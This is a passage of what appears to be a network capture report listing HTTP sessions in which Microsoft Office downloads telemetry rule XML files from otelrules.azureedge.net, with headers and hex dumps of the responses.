                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                92192.168.2.45813813.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:01 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:01 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:01 GMT
                                                Content-Type: text/xml
                                                Content-Length: 958
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                ETag: "0x8DC582BA0A31B3B"
                                                x-ms-request-id: 080ba15e-001e-0082-732b-275880000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232301Z-15b8d89586ff5l62aha9080wv000000008g000000000cd9a
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:01 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                93192.168.2.45814013.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:02 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:02 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:02 GMT
                                                Content-Type: text/xml
                                                Content-Length: 2592
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                ETag: "0x8DC582BB5B890DB"
                                                x-ms-request-id: 88d45aac-e01e-003c-3e01-29c70b000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232302Z-r197bdfb6b46kmj4701qkq602400000006dg000000002e3c
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:02 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                94192.168.2.45814113.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:02 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:02 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:02 GMT
                                                Content-Type: text/xml
                                                Content-Length: 3342
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                ETag: "0x8DC582B927E47E9"
                                                x-ms-request-id: fe72e82f-401e-008c-6e5e-2786c2000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232302Z-17c5cb586f6g6g2sa7kg5c0gg000000002f000000000d2q8
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:02 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                95192.168.2.45814213.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:02 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:02 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:02 GMT
                                                Content-Type: text/xml
                                                Content-Length: 2284
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                ETag: "0x8DC582BCD58BEEE"
                                                x-ms-request-id: a1443afe-101e-00a2-13ee-279f2e000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232302Z-15b8d89586f8nxpt6ys645x5v000000008eg00000000aytq
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:02 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                96192.168.2.45813913.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:02 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:02 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:02 GMT
                                                Content-Type: text/xml
                                                Content-Length: 501
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                ETag: "0x8DC582BACFDAACD"
                                                x-ms-request-id: 97ce691d-801e-0047-0a01-277265000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232302Z-16849878b78qf2gleqhwczd21s00000007bg00000000n048
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:02 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                97192.168.2.45814313.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:02 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:02 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:02 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1393
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                ETag: "0x8DC582BE3E55B6E"
                                                x-ms-request-id: f473ee8a-401e-00ac-6cf0-260a97000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232302Z-15b8d89586f989rkwt13xern5400000002dg00000000fnxh
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:02 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                98192.168.2.45814413.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:03 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:03 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:03 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1356
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                ETag: "0x8DC582BDC681E17"
                                                x-ms-request-id: 19a18c92-701e-0098-0fb0-26395f000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232303Z-16849878b78p49s6zkwt11bbkn00000006v000000000gt6t
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:03 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                99192.168.2.45814513.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:03 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:03 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:03 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1393
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                ETag: "0x8DC582BE39DFC9B"
                                                x-ms-request-id: 0243abe0-001e-0028-29fb-25c49f000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232303Z-16849878b78wc6ln1zsrz6q9w800000006s0000000011cvh
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:03 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                100192.168.2.45814613.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:03 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:03 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:03 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1356
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                ETag: "0x8DC582BDF66E42D"
                                                x-ms-request-id: 2e99a458-901e-0067-29ae-26b5cb000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232303Z-16849878b787wpl5wqkt5731b400000007x000000000qyqc
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:03 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                101192.168.2.45814713.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:03 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:03 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:03 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1395
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                ETag: "0x8DC582BE017CAD3"
                                                x-ms-request-id: cd04a713-f01e-003f-7315-26d19d000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232303Z-16849878b786lft2mu9uftf3y400000008fg00000000a5xw
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                X-Cache-Info: L1_T2
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:03 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                102192.168.2.45814813.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:03 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:03 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:03 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1358
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                ETag: "0x8DC582BE6431446"
                                                x-ms-request-id: 3a0fb8a5-701e-0050-6930-276767000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232303Z-15b8d89586f6nn8zqg1h5suba800000002cg00000000ea0m
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
